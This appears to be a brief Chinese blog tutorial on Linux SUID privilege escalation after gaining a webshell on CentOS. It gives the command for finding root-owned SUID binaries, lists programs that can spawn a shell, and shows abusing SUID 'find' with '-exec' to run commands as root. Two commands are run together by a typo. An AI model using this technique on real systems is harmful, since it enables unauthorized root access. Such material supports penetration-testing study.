SUID的原理就是将某个命令提升权限,当普通用户去执行时候,可以达到root命令执行的权限
环境:centos
1.拿到webshell后上传脚本linEnum 探针是否有SUID
LinEnum(工具) 查看suid 的文件(Linenum使用记得chomd 777)
手动:
find / -user root -perm -4000 -print 2>/dev/null
查看到可以使用suid漏洞的命令 find
以下是一些可用于产生shell的程序
namp
vim
less
more
cp
nano
mv
find
2.使用find命令进行提权
touch yx1find yx1 -exec whoami \;
root权限。
如果直接whoami
用户是yx。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
